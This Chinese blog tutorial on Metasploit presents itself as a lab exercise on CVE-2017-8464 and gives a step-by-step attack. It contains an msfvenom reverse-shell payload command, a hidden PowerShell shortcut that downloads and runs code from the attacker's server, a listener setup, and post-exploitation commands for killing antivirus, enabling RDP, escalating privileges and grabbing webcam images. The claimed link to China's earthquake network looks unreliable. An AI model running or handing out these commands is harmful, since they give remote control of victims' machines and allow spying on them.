msf渗透练习-震网三代

这篇具有很好参考价值的文章主要介绍了msf渗透练习-震网三代。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

 

说明: 本章内容,仅供学习,不要用于非法用途(做个好白帽)

(一)震网三代漏洞

“震网三代”官方漏洞编号是CVE-2017-8464,2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危

传播的载体一般是LNK ,LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。被攻击机插入存在攻击lnk的U盘后会反弹shell,哪怕是被隔离的内网,也可以在不上网的情况下被攻击

后来发现该漏洞曾被攻击者用于攻击中国地震局的自动地震台网第三代建设(即“震网三代”)。具体而言,攻击者利用该漏洞,通过发送恶意文件进行攻击,危及了“震网三代”系统中一些设备的安全。因此,该漏洞也被称为“震网三代漏洞”。

漏洞并不是只针对“震网三代”系统而存在,而是存在于微软Windows操作系统中,目前可以存在该漏洞的系统如下:

window系统

  • Microsoft Windows 10 Version 1607 for 32-bit Systems

  • Microsoft Windows 10 Version 1607 for x64-based Systems

  • Microsoft Windows 10 for 32-bit Systems

  • Microsoft Windows 10 for x64-based Systems

  • Microsoft Windows 10 version 1511 for 32-bit Systems

  • Microsoft Windows 10 version 1511 for x64-based Systems

  • Microsoft Windows 10 version 1703 for 32-bit Systems

  • Microsoft Windows 10 version 1703 for x64-based Systems

  • Microsoft Windows 7 for 32-bit Systems SP1

  • Microsoft Windows 7 for x64-based Systems SP1

  • Microsoft Windows 8.1 for 32-bit Systems

  • Microsoft Windows 8.1 for x64-based Systems

  • Microsoft Windows RT 8.1

window服务器:

 

  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1

  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1

  • Microsoft Windows Server 2008 for 32-bit Systems SP2

  • Microsoft Windows Server 2008 for Itanium-based Systems SP2

  • Microsoft Windows Server 2008 for x64-based Systems SP2

  • Microsoft Windows Server 2012

  • Microsoft Windows Server 2012 R2

  • Microsoft Windows Server 2016

(二)案例练习

1、 创造后门

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.23.44 lport=4444 -f psh-reflection>/var/www/html/link.ps1

-p:指定需要使用的payload(攻击荷载)

windows/x64是靶机的操作系统是window的64位

meterpreter/reverse_tcp是一种载荷类型,会监听一个TCP端口,并等待目标系统连接
lhost是攻击机的ip

lport是攻击机的端口,(之所以设置4444,是后门配置payload时候默认端口是4444)

-f:指定输出格式为psh-reflection模块(用于在目标Windows系统上执行PowerShell脚本)

>/var/www/html/link.ps1是保存在/var/www/html目录下的lin.ps1中

msf渗透练习-震网三代

 

 

 2、开启apache服务

在另一个端口,用root权限运行service apache2 start ,开启apache服务

msf渗透练习-震网三代

 3、传播

这里使用社会学,利用快捷方式传播

在靶机中,右击-新建快捷方式,输入

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.23.1/link.ps1');test.ps1"
 

其中http://192.168.23.1/link.ps1是我们攻击机的地址ip,

意思是是通过从攻击机主机的link.ps1文件中创建快捷方式

msf渗透练习-震网三代

 

4、在攻击机上配置监听与payload

use exploit/multi/handler      使用监听模块

set payload windows/x64/meterpreter/reverse_tcp     设置payload

options    查看参数

msf渗透练习-震网三代

 set lhost 192.168.23.44     设置攻击机的ip为192.168.23.44,这里的端口与ip需要跟第一步设置后门的ip和端口要一致,我在生成后门的时候,设置端口为4444,所以这里就不用设置了

msf渗透练习-震网三代

 5、开始监听

监听命令: run 或者 exploit

监听之后,如果在靶机的的快捷方式被运行,我们就可以通过后门,对靶机进行控制

msf渗透练习-震网三代

 

6、后渗透:

进行控制之后,我们就可以干我们想干的事情了(违法的事情不要做,做个好白帽)

msf渗透练习-震网三代

 msf渗透练习-震网三代

此外还可以进行其他的操作

 

查看进程:ps

查看当前进程号:getpid

查看系统信息:sysinfo

查看目标机是否为虚拟机:run post/windows/gather/checkvm

查看完整网络设置:route

查看当前权限:getuid

自动提权:getsystem

关闭杀毒软件:run post/windows/manage/killav

启动远程桌面协议:run post/windows/manage/enable_rdp

列举当前登录的用户:run post/windows/gather/enum_logged_on_users

查看当前应用程序:run post/windows/gather/enum_applications

抓取目标机的屏幕截图:load espia ; screengrab

抓取摄像头的照片:webcam_snap

查看当前处于目标机的那个目录:pwd

查看当前目录:getlwd文章来源地址https://www.toymoban.com/news/detail-491159.html

到了这里,关于msf渗透练习-震网三代的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 内网渗透 Metasploit(MSF)基础使用

    ​ Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在 Metasploit 和综合报

    2024年01月16日
    浏览(45)
  • 详尽的msf——meterpreter——渗透测试教程

    本文仅供学习参考使用,切勿用于非法事情!! 众所周知,msf是大家公认的神器,年少不知msf香,总想自己写程序。 现在发现msf很厉害,可以在它的基础上开发。 msf是框架,什么意思呢,用它可以做渗透攻击的一整套流程,包括前期探索(发育),中期攻击(开团),后期

    2023年04月15日
    浏览(43)
  • 论后渗透MSF之 | 添加路由和代理

    内网中添加路由主要是 充当跳板 功能, 其实是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的meterpreter shell的基础上 添加一条去往内网的路由 ,此路由的下一跳转发,即网关,是MSF攻击平台与被攻击目标建立的一个session会话 通过msf添加路由功能,

    2024年01月16日
    浏览(42)
  • 内网渗透测试 MSF搭建socks代理

    最终效果为如此,web服务器可以ping通外网和内网两台服务器     信息收集 发现端口: 80 http 3306 mysql 敏感目录: /phpMyadmin 现在咱们查询一下日志功能是否开启,默认是关闭的。 show variables like \\\"general_log%\\\"; 命令行 set globalgeneral_log=\\\'on\\\'; 图形化: 输入一句话木马并执行,使日志

    2023年04月08日
    浏览(39)
  • 我的MSF之Android木马渗透的学习笔记

    免责声明:以下内容仅供学习参考,如果用于任何非法途径,后果自负,希望大家做一个遵纪守法的好公民,一起保护国家的的网络安全!!! 攻击机:kali 靶机:Android 1.木马制作 通过 msfvenom 制作安卓木马 2.开启http服务 在 kali 终端输入以下命令开启http服务 3.靶机下载木马

    2024年02月12日
    浏览(34)
  • Kali Linux利用MSF渗透Windows11电脑

    目录 一、MSF简介 渗透环境 二、渗透流程 1.Kali Linux进入Root模式  2.生成可执行文件 3.运行msfconsole命令  4.配置参数  5.在靶机Windows11打开可执行文件 6.渗透 Msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayloa

    2024年02月06日
    浏览(42)
  • 利用msf进行内网的木马渗透详细教程

    本文仅限学术交流,请勿用他人实践 本文通过kali系统进行内网渗透。主机 ip:172.20.10.14 靶机ip:172.20.10.3(win10)  文章目录 前言 一 准备工作 二 进行渗透 1.开启服务:需要开启apache和postgresql服务 2.制作木马文件,利用msf进行渗透 总结  提示:以下是本篇文章正文内容,下

    2023年04月08日
    浏览(43)
  • 内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

    前言 作者简介:不知名白帽,网络安全学习者。 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net/m0_63127854/category_11885934.html 网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan CFS三层靶场搭建: 内网渗透之CFS三层靶机搭建_不知名白帽的博客-CSD

    2024年02月02日
    浏览(40)
  • MSF测试工具说明

    内容为学习笔记,如有侵权,请联系删除 安装 Linux下kali自带,可以更新 Windows下: 官网https://www.metasploit.com/ 点击下载跳转到github,然后下载Windows最新版,记得把电脑防护都关了,不然安装不了,有毒 环境变量配置: 安装目录下的bin的地址复制粘贴到系统变量的path里面 直

    2024年04月28日
    浏览(33)
  • 内网渗透—代理Socks协议、路由不出网、后渗透通讯、CS-MSF控制上线

      本章主要涉及到的技术就是如何让攻击机通过能够上网的主机当作跳板去连接内网中不能上网的主机,有点绕口。不过通过介绍页能够大概明白是什么意思。   在我们做渗透的时候,通常企业都会设定有些软硬件防火墙,当企业有业务需求的时候会通过防火墙放通地址

    2024年02月05日
    浏览(51)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包